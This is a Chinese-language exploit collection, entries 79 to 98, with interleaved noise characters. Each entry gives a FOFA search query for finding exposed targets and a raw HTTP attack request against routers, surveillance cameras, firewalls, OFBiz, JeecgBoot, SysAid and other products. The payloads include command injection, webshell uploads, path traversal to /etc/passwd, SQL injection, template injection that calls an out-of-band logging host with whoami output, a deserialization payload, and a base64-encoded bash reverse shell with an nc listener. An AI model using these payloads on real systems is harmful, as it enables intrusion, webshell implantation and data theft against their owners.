4 d' m( W9 C6 l Z1 M79. BYTEVALUE 百为流控路由器远程命令执行
" {. {0 W( S* S# VFOFA:BYTEVALUE 智能流控路由器
$ {8 u* m; r. V: h0 o0 i! KGET /goform/webRead/open/?path=|id HTTP/1.1# O- p& G) `# D
Host:IP6 \' V& e6 m+ F8 f2 g* y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.05 D3 N0 C8 F( g, u) T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 D* @! N0 f: Q# ?0 W' G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% {3 e& v/ e; b$ \: l2 ^1 q
Accept-Encoding: gzip, deflate
: t9 b+ k5 w3 d1 ]0 x5 fConnection: close
' L7 W0 W) ^% K, ^5 iUpgrade-Insecure-Requests: 1) t& j/ j* K9 g2 I
% u; a3 h7 m# ^. a& K9 \4 [
& g8 I9 s; R. t80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
+ Q$ Q9 b/ j% G4 u. O1 K( `5 y( p! mFOFA:app="速达软件-公司产品"7 W2 K7 {+ w Z$ U
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! ]; D Z- h# X% Z2 M/ h- |4 K j
Host: x.x.x.x
4 e& t( M( i/ ~- rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 i# `5 O9 w0 rContent-Length: 27
3 e8 U0 Q: R1 L# { _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) y3 `1 y. K" ^& ~4 U9 XAccept-Encoding: gzip, deflate( e9 @2 k* d6 _. w5 N8 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, J* ]5 F- E) l, P0 oConnection: close
! m, ^+ {! d/ u8 IContent-Type: application/octet-stream
, u% p+ W8 h: e/ r: aUpgrade-Insecure-Requests: 1
1 X' ?% t: D2 ]5 O
5 l% i! ?) h2 t$ W<% out.print("oessqeonylzaf");%>
5 [( Y# s, u0 K; w* B, ~2 j4 S: J
( z3 G" ~; v* m9 w# k$ X2 e$ ?7 y; [3 \2 [# ]; V; q
GET /xykqmfxpoas.jsp HTTP/1.1
( I( K7 W' [- M1 `6 |Host: x.x.x.x- G$ w. E9 P- `# H- `/ T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) Y* K6 a% g3 d: R6 b* [
Connection: close
+ \" X) X: I' p2 L7 u7 OAccept-Encoding: gzip: n0 a5 j% A4 N; R+ l/ ~
# E' t3 y ^/ Z& i/ C( Z
! v- B2 A2 K+ d+ q# s81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
# P; [- m& U5 g) j+ Z/ wFOFA:app="uniview-视频监控"
: J( F( s+ y1 E+ ~9 u Y$ IGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1) s9 n* y- Y- Y2 M
Host: x.x.x.x( G$ K! B+ @7 U! ]9 q- U5 e% y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 _8 o$ Y& b. S# C+ ~
Connection: close
1 A$ z1 F$ H3 H8 Y0 J2 q( dAccept-Encoding: gzip# j! V9 G; i; l
& ], S. A2 \. }# a. N" \9 C+ L9 f0 B7 W6 e! b5 \0 U$ Y0 ?
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行3 t' \0 W* @, W2 m- j
FOFA:app="思福迪-LOGBASE"8 h3 @' L8 N3 l# j g, O
POST /bhost/test_qrcode_b HTTP/1.1
% H2 G6 a# H0 ?8 Q! V. CHost: BaseURL
2 H$ ?) J. F5 E! IUser-Agent: Go-http-client/1.1
+ ]6 i" h- f( L) }4 rContent-Length: 23
7 X6 W: }5 x) d& ` tAccept-Encoding: gzip" ^. n6 Y! N. h
Connection: close
u* }, i( e, p( cContent-Type: application/x-www-form-urlencoded& l3 ]6 v5 T a, w5 P- B% q
Referer: BaseURL
6 O2 ~8 F2 |. D+ n0 P: q4 h6 G' W" E. ^* D8 N
z1=1&z2="|id;"&z3=bhost8 t' B' b; u q$ O3 \3 p
0 `7 m' \5 K1 K) Z8 F+ k
/ K' w9 P6 J+ `5 r! J0 z4 r( ]
83. JeecgBoot testConnection 远程命令执行
: ]0 ~$ `0 q, T0 m4 ~8 i/ ~FOFA:title=="JeecgBoot 企业级低代码平台"9 A1 q. {$ x* i
+ ~' a6 d4 H O4 a
Y/ N* a7 `% YPOST /jmreport/testConnection HTTP/1.1
, k0 t- A2 h% ?* u5 F0 hHost: x.x.x.x) {) w q- z+ o. _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 i& Q& H: }: ]8 D
Connection: close$ a/ H- k# l6 X3 X: u
Content-Length: 8881
- K5 o1 t! e6 M5 w+ kAccept-Encoding: gzip
, ? p' r6 W( lCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO", h1 M4 X9 P; C( F# \# A$ `1 d8 U
Content-Type: application/json- A- ~1 D: S! K
& ]$ _. W/ H1 v' Q7 m! H9 i
PAYLOAD4 ^0 g" K* H% r2 e$ j
( L& L8 M" Q1 L( D0 E
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
, q6 V/ z) M* dFOFA:title=="JeecgBoot 企业级低代码平台"
8 z" b: U5 z5 w( Z9 m# ]4 W
/ B0 D, q$ [0 k/ ^ W7 {0 j1 M+ Q( ^ I5 l5 h1 B
6 ~& a" I: \1 _+ s1 l
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.17 w: m3 X I. k! @
Host: 192.168.40.130:8080
4 y, O9 z, h' n& v5 T: |% @User-Agent: curl/7.88.1# P" `( |5 f2 [8 W! ^
Content-Length: 156
5 x2 c6 {/ o" s/ xAccept: */*
- r% l% |" N# K# Y8 P- x8 n mConnection: close
8 p: a0 @+ Z! @! eContent-Type: application/json2 a: }/ O; ]6 c/ n5 N0 Y
Accept-Encoding: gzip
7 K2 A/ z4 F$ _/ i0 J6 [' `
3 `* S# f5 q+ p8 Q9 J" N0 ~3 w% q8 n; z{5 d" S+ e+ c/ a& a
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
' A2 n) {5 e6 f: O' \- c) t "type": "0"/ {- o( M. _' _. Y3 d6 t9 E
}
. L: K, T' Q" G5 X" A. V4 c h6 s- Z, |$ K
e( G2 l; t( z- ^1 l
85. SysAid On-premise< 23.3.36远程代码执行8 l. t" e' R( } @, _ e" V
CVE-2023-47246
5 f& {" _6 K' g1 vFOFA:body="sysaid-logo-dark-green.png" " e% E& i9 p3 |" x3 f0 T% f8 o, b
EXP数据包如下,注入哥斯拉马
; y8 Y, J* K: HPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
; S$ ~+ j$ Q1 [% m5 V5 G" a/ _. [Host: x.x.x.x
3 P, E/ p9 @) Q* ?9 d* nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 O/ _: e8 S6 I& w4 OContent-Type: application/octet-stream; R* O; k. I4 n
Accept-Encoding: gzip+ C1 W9 l1 G$ q6 t/ c( g
0 b; F1 a3 R) k/ ~. q
PAYLOAD
( L0 b0 ^+ k, ?( v# ^) u! n) f" d
; m$ r3 ?/ T1 c W9 [7 u7 n4 C回显URL:http://x.x.x.x/userfiles/index.jsp
7 f, f4 h, Y* R% Q" d) N1 i
4 y$ I Y+ c* c! r8 F/ O. Z0 H86. 日本tosei自助洗衣机RCE* Y7 X0 K, g9 L% \, H
FOFA:body="tosei_login_check.php"% u( P' O; {, `3 N- m
POST /cgi-bin/network_test.php HTTP/1.1
/ O" k# z+ Q9 IHost: x.x.x.x
2 J5 f) [' X9 b6 W4 l' lUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 c8 l* d2 S; P3 ]7 M( u( H0 M: a+ |Connection: close* ]" s( A( K& i
Content-Length: 44: S* G) v: o: U3 |/ ?' K
Accept: */*# \% a1 ~" k( h) g* A
Accept-Encoding: gzip
' u2 P0 p$ n: t: w$ X2 ZAccept-Language: en0 O2 O' I5 m: {
Content-Type: application/x-www-form-urlencoded
; y# i+ j Y0 {% n/ ?% m; {3 E) D X* T% m4 F, s7 e! m
host=%0acat${IFS}/etc/passwd%0a&command=ping
- \! K' p/ J0 k, ~! D+ K+ J
; T j2 ^4 e/ ?( w% ?8 L$ y+ W& J6 y6 b+ ~# a
87. 安恒明御安全网关aaa_local_web_preview文件上传
- R! @5 D' f1 S: E1 UFOFA:title="明御安全网关", ]/ O, U$ t- n5 ~1 ^5 {; c
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1- {+ d" q# n" Z; S e1 W
Host: X.X.X.X
& _" M3 N2 m. o! | iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& e3 y& d6 ?$ y- t3 b' `- b1 y& U
Connection: close
, A4 E; q) |, j2 v4 BContent-Length: 198: o$ ~/ ?0 n4 E' V4 b3 X, y: `
Accept-Encoding: gzip& e* T! @0 G# v* e
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
' {2 V& W$ K1 \% I8 q
: @' U, M; m: ~% t7 {# P--qqobiandqgawlxodfiisporjwravxtvd; s% C# I. u$ ^1 t0 i
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"; l4 {3 b( ^+ \9 A8 ^& W
Content-Type: text/plain+ ^, N, i$ U9 z3 D
; }2 `2 q# H4 q
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
' P5 O& b3 S) P--qqobiandqgawlxodfiisporjwravxtvd--( ]" a$ Z0 n! N+ t. ^! t$ Q
, r1 ~( m B" t5 T
4 y9 Z& h6 H" m, x0 _, h/jfhatuwe.php( _( P, C j; m6 P: y/ r; }) b
/ |1 b: g& B' N; `88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行) U+ A0 Y. G7 I* m7 f
FOFA:title="明御安全网关"
" P: f3 ~- Q9 N8 o$ s- ?GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1( @1 s6 e' n8 S6 i# S
Host: x.x.x.xx.x.x.x+ I; \8 d. s) k$ T0 e4 @1 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; W1 {* h1 p& V% N0 c1 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, E+ _. f3 } A
Accept-Encoding: gzip, deflate1 v( ]6 w0 B6 `, D2 h B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 n" Y0 S; F# h; ]# I
Connection: close
, e$ f- i3 I2 s9 h* h K" e ^: W9 o8 L
6 T0 T2 P4 U, T/astdfkhl.php
h* k [" E' A0 a" V2 Z) L& S) |% l( R4 `, p
89. 致远互联FE协作办公平台editflow_manager存在sql注入! A( ]# l1 [0 d8 p$ Q
FOFA:title="FE协作办公平台" || body="li_plugins_download"2 D! l1 d$ s/ w
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
! ?' V6 S+ {: [) V" c3 `Host: x.x.x.x
; b. N! L. H. b& p$ XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 W, w/ C f! z) l5 q7 ~& i
Connection: close8 m( C& ^/ F6 v+ C
Content-Length: 41) `8 s0 u j; i4 u4 p+ R: i6 Y# I
Content-Type: application/x-www-form-urlencoded* |/ d' z: M. O( ]- @( g r5 A& D
Accept-Encoding: gzip
, A3 y5 n1 r- p8 |" O- b
; `5 T) |% v2 O) P- `* h! f# Ioption=2&GUID=-1'+union+select+111*222--+
3 Q `! ~9 Y, l1 g& O
3 H+ c& r, T7 p1 u! Y6 f% D
5 N: x5 b- N: v90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行* b. f; \# q3 W) N& s
FOFA:icon_hash="-1830859634"
& j+ U- p% B: z6 b0 oPOST /php/ping.php HTTP/1.1
2 l2 C5 Y0 k) V: YHost: x.x.x.x4 U* O- R# V& K; u+ c' c1 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' J$ W' \/ _3 h7 FContent-Length: 51
- A. H2 p. h0 X* [+ ?/ SAccept: application/json, text/javascript, */*; q=0.01
8 O6 {) m) q& f- DAccept-Encoding: gzip, deflate
& q4 ^6 V0 y# wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- p( h7 v5 E# @) H5 b2 p- qConnection: close* ]$ `% H* D3 _9 O
Content-Type: application/x-www-form-urlencoded5 y% ~7 W H" h' n4 D; G' {
X-Requested-With: XMLHttpRequest: ~4 j# h. [# |& L8 W1 {
- `$ z; }- P7 Njsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
) D; [" @1 i9 E6 W0 T4 R% d8 N) p1 O8 @; Z$ T# v$ o) j
0 [; O: p5 h I, ^4 m
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取) U2 |1 a0 p/ P% r7 Y; D7 Y
FOFA:title="综合安防管理平台") P$ W" I' c% }+ j' ^$ Z
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.15 ~! Z" P8 h }; s2 P* |
Host: your-ip
$ L1 G7 Q% {# |$ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
R1 q4 e% S" u# P" JAccept-Encoding: gzip, deflate
+ R4 N9 \0 p9 ?) {( u* pAccept: */*
; }+ U6 ]: U' w& q0 rConnection: keep-alive
- b+ k1 X$ s" g0 z8 m
* [; l3 ^0 j% H& T1 t
6 Y7 Q' B. D5 [8 v* M9 h8 J( b0 t! I' a# S
92. 海康威视运行管理中心session命令执行2 o5 A) A6 j( k# t4 y. q
Fastjson命令执行
4 b; X m- a/ o% Vhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76" C. y& p# z) `, r) w
POST /center/api/session HTTP/1.1$ V. Q6 a( [: Y# ~- m* G8 a
Host:4 `" W& W4 Z/ Z- y
Accept: application/json, text/plain, */*2 i8 A5 I) O# f
Accept-Encoding: gzip, deflate
t) P* y# o/ M$ f0 JX-Requested-With: XMLHttpRequest
; p; k* _: j. e+ fContent-Type: application/json;charset=UTF-8/ w7 x% s" ^4 ]+ [4 n
X-Language-Type: zh_CN
4 R1 h& g4 X( Y- _* D7 ATestcmd: echo test
! t8 S. V7 n+ G3 o. W5 q% q2 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.365 V+ }4 a4 ]8 N7 a- w' S
Accept-Language: zh-CN,zh;q=0.9
0 |9 ^/ h4 Z- m$ I m8 E3 UContent-Length: 5778
/ Y; p/ s o5 O4 T' ]3 `
3 p) t2 M1 J- U H, `- kPAYLOAD
* j, ^+ F! K5 ?7 U. T3 \
; F9 u3 q, N. Z4 i" c7 R" E1 C" t' p
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传 O: P r# L+ e$ C0 q
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="; y3 F0 Z0 m/ v7 Y3 b! X3 Z( ~
POST /?g=app_av_import_save HTTP/1.1# v1 {* |4 B, [! r7 u- {
Host: x.x.x.x
/ {: x# R5 e. [ rContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
6 X) O) G9 h$ W6 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 y0 J9 D6 C* c' u' S4 o
) P$ i# i7 h7 {6 e q. _------WebKitFormBoundarykcbkgdfx- o1 U5 Y4 Z7 q# e. q$ ~
Content-Disposition: form-data; name="MAX_FILE_SIZE"
7 L! W: s7 r% T! G U4 ~9 L% h4 |# t* S5 J0 @5 w5 K1 n
10000000% v. A% [7 Y4 a+ l3 g) h [
------WebKitFormBoundarykcbkgdfx. C) n3 L+ t* T4 m U" W
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
4 v! [6 V9 ^" z# W8 NContent-Type: text/plain* I9 ^: e0 L" l# @1 @
& E7 ]7 q4 g3 l0 F4 i/ B) {2 Y" T
wagletqrkwrddkthtulxsqrphulnknxa8 P* c6 H# m. C) E" ^. H$ g
------WebKitFormBoundarykcbkgdfx. m9 y# k( Q+ b' U6 Y
Content-Disposition: form-data; name="submit_post"
: F6 z& H. {. b1 ^' @/ e0 W/ l f6 t4 v9 z
obj_app_upfile) `, a! l8 M# A( A0 h
------WebKitFormBoundarykcbkgdfx% E3 Q0 }3 v" B6 Q) C3 x* Z
Content-Disposition: form-data; name="__hash__"
2 [9 M# a7 F/ d. X/ s
7 D" e! s5 f$ F) H0b9d6b1ab7479ab69d9f71b05e0e9445% p* \; a0 h% I8 M q" W
------WebKitFormBoundarykcbkgdfx--+ v! D0 E- u& r2 f# X
; Z$ @3 @/ D( k( d* F* r
7 E! Z7 n1 C; CGET /attachements/xlskxknxa.txt HTTP/1.1
* T2 c: l0 Q0 Z# wHost: xx.xx.xx.xx* r3 e2 _/ h- J1 Y7 _. c" P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! M# y/ L% q& r1 E) `+ |+ N
# p3 ^- k9 s7 L
0 A' k+ f8 b* Y! h$ F2 m* r94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% c2 U$ a8 g* I1 b5 ]
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
- f7 d1 T0 {) e# B- c2 zPOST /?g=obj_area_import_save HTTP/1.1
% n. X7 M0 O: |$ a; \8 LHost: x.x.x.x1 G i8 D! \4 D1 v2 {& T, S. h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt* C+ o% {2 s# n5 j, f1 Z( t- L5 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, s# v' M; ?4 [, N0 N+ n6 m/ n5 l! Q% P! o; Y7 ^
------WebKitFormBoundarybqvzqvmt4 k J) R Q: o2 c9 e6 T
Content-Disposition: form-data; name="MAX_FILE_SIZE"4 ?6 R" I0 j6 m: x2 Q- D
; w: H; a( @5 L. N8 B
10000000
% K; A1 J: P. D; W( d------WebKitFormBoundarybqvzqvmt& Q' G v6 h- i7 M8 i# z
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
% u! |; q0 Y+ k- u$ A4 X2 o$ yContent-Type: text/plain& h; @% o* ?1 O4 `; ]0 u0 H
0 U# a' q. ^5 D7 k& q( W. c3 epxplitttsrjnyoafavcajwkvhxindhmu0 m _# w1 H& r; p8 e) X# l
------WebKitFormBoundarybqvzqvmt9 D, _2 V4 Y" L% G6 z# J) a
Content-Disposition: form-data; name="submit_post"
8 r1 E( l- H! B' M
% {* w1 ^) b0 X6 Z; K/ I. Eobj_app_upfile
) }& w6 |- _% s* R------WebKitFormBoundarybqvzqvmt
- e1 l {$ H- k2 i d9 O; I8 [! p" TContent-Disposition: form-data; name="__hash__"
: |) U. X) Q q0 S! Z1 s4 c" Y% H4 d) @. a7 p( L. Q5 C$ J1 P
0b9d6b1ab7479ab69d9f71b05e0e9445
* J8 l+ u& \0 }* R- D------WebKitFormBoundarybqvzqvmt--
+ i+ {: H, _+ u; O9 u/ I: x; \ z4 V2 k
; ^8 l6 t- s L- W3 y
6 m- t5 G( s3 k8 Q$ zGET /attachements/xlskxknxa.txt HTTP/1.19 J* F( G% `0 S9 Z) Q
Host: xx.xx.xx.xx
5 B5 x2 C" n: {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& t# W% A% U0 Y6 x8 ^% }4 O( i X
+ ?, P8 e; ^6 J" J$ V; ]5 a, s: @; ^" L9 g& v1 Y% O
) |8 t2 j' \1 h( @
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行' D6 P) m7 Q. o: k; M
CVE-2023-49070
/ o! R& @: n- y- s0 [$ iFOFA:app="Apache_OFBiz"/ ^' K6 x: p! E, R
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! s4 n8 R/ H# ~. z6 `
Host: x.x.x.x
4 M, ?. ?* H# ^: @8 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# Q, s# m- D/ j6 e$ A- p8 VConnection: close: o2 ^' F" D0 r e4 Z) ]! e( r" l
Content-Length: 889 G# U9 U o' Q( @: F& G
Content-Type: application/xml
9 K, @: ]$ F3 H* @" b% oAccept-Encoding: gzip
+ R$ ~7 ~& P N, i6 E3 C4 \6 x
0 {( s: ?* q6 w5 r! z" V5 D<?xml version="1.0"?>
6 \6 d! ~% k, F8 L$ b3 l% W1 Q' F<methodCall>
4 N7 g! G, K, F t! @9 c1 j <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
9 h$ B# {( ^7 [. S$ K0 l) d <params>
6 y& H/ X: Q, Y* N3 N <param>6 U2 B0 ?: Y N9 r' z' G
<value>
/ \% s' `! j, L5 b# R6 L <struct>7 E, ^! y4 c0 m1 G; z
<member>
& B! Q1 ^" \$ h7 ?5 q* ~* r0 u <name>test</name>+ {- G' D. r; d. v* X& {: t! g
<value>
7 Q# G t) E+ q. K <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>" V! F$ Z# Q9 [& B8 I( ]8 h
</value>. S% T Z# x0 f: ^& r
</member>5 P5 E& a. `6 E
</struct>9 J# c; C( H( h# N7 W! T
</value>7 \6 q, T9 N2 o0 E* I
</param>
+ I/ C+ `; ^: s, l* q+ o6 f </params>
& Q. ^, e: x; z, l: s0 q7 C</methodCall>+ E& i7 e. V( m6 T3 n, c$ G1 M
1 I+ |7 x9 E7 ~6 G1 f
6 u9 O' x5 o L+ C; V' n- j5 s用ysoserial生成payload
: ~2 z; E* e, P( djava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"% `3 L( l* R: {4 N* x5 L+ J
7 @6 }2 z3 h9 w7 a f
7 Q+ f" e" ]+ T9 \5 n5 S$ ~将生成的payload替换到上面的POC3 e1 l8 c$ z( T0 B
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: u& j1 h& N( Z, t- W# c6 b
Host: 192.168.40.130:8443+ n' Q* M1 Q! _6 U, _9 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' m3 i" Q' e! X; i8 S( J) `: B
Connection: close
( l/ t4 K/ x3 {/ vContent-Length: 889/ ~+ Y" A/ g% l
Content-Type: application/xml
" i+ t t/ W( X9 O# }1 M+ k- RAccept-Encoding: gzip: j7 r# X7 L% k! r' Y4 t4 I5 ^
- i6 R4 I! W- S
PAYLOAD
~; A$ ~4 A$ W
) z9 J) Z1 _+ G3 X96. Apache OFBiz 18.12.11 groovy 远程代码执行
) g; Z# R. E* ^+ D8 ?8 gFOFA:app="Apache_OFBiz"
p- K( Z5 k d5 ePOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- m3 ? ~* a' I# ^* h* Z0 D) A3 DHost: localhost:8443" c4 q* ^2 R5 q: t3 T- K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 D3 ?1 w7 ~+ G" _% }- d8 G! C9 jAccept: */*
7 m+ n8 N- M6 K$ q. RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 @8 a$ U! ]1 t4 o( D" T; eContent-Type: application/x-www-form-urlencoded7 J: N- E& E& j- Z
Content-Length: 555 m4 b0 X- j" r1 e5 B/ P
; W; z m! h8 m; ]7 `' L
groovyProgram=throw+new+Exception('id'.execute().text);" t! ?1 ?9 T P. E/ S* T1 k
; G i$ V: m7 j, K/ [4 g0 E" [9 `8 D9 N2 w1 W F
反弹shell
. L% r# B" Z( }$ ^4 J& C" A* v/ I在kali上启动一个监听
& m% k U! s* P$ Inc -lvp 7777
, x. l4 I* N5 k! _. V& \
/ o& p% j8 D8 |- g" V4 WPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
8 n6 x" Q5 [1 U& Q9 cHost: 192.168.40.130:8443
' b/ N- `' m# k2 r" v0 o& }4 m; D# }; ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! T/ Y# w( V) I4 O" T5 MAccept: */*# i, I" C; J* u$ ~: Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; F0 k* Y. c" Q1 n+ x6 G; m
Content-Type: application/x-www-form-urlencoded4 ]. S" ]4 y4 d1 d* i# e; o! G
Content-Length: 710 _& C; g1 G( f& @2 e; x
, a1 S9 V/ ?% @' h3 t. V
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();+ ~/ v5 u0 t6 W- @% z+ l# S3 e1 o
2 g3 ]' Z9 m4 o" ^) a1 ?1 H6 y97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行! r! Y& a; m3 J! e* t& Z
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
8 S, d9 h1 `( \- i: D, vGET /passport/login/ HTTP/1.1! u$ p- S( r) d5 H. |/ Y1 ^
Host: 192.168.40.130:8085. W' |) R: |6 L! Y$ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' ?' ?& y# U. C
Accept-Encoding: gzip! ` ~$ {9 U1 C4 e, y
Connection: close
: D! A3 I9 n& X/ ]2 g+ b* R7 ZCookie: rememberMe=PAYLOAD! l0 |4 G5 \) C
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"- l& a% J/ B! G% D
, ?4 P5 v) ]) Q0 M5 g" H
: L4 g/ {0 E$ z. n( @! M# B9 \0 J
98. SpiderFlow爬虫平台远程命令执行& t1 v9 x: p, F" |7 X! w% _
CVE-2024-0195% o" ~8 |, |. M) p9 G& I, w
FOFA:app="SpiderFlow"( c0 }5 g2 q8 e- X: q& o8 I/ R: x
POST /function/save HTTP/1.1* Q$ Q* ^: [. Q( L2 E3 _
Host: 192.168.40.130:80880 F0 N- [0 p2 A7 j* d0 k8 N3 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) J) ]& I; C) p; }3 o {! Q
Connection: close6 S3 \, C, v! F% z6 M% ~; Y
Content-Length: 121
: u+ k; g% K+ f3 uAccept: */*9 U+ R. [9 s3 U3 K5 M1 t5 [& R% Q
Accept-Encoding: gzip, deflate/ J: e6 }, _) x- J3 j4 ?. A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) {/ d1 f: Q0 J; Q' D2 W# \; v
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ A/ ?/ u8 P1 f" G
X-Requested-With: XMLHttpRequest |$ y, E$ k* |
: Z4 w! L9 s3 m! ]3 t2 G
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
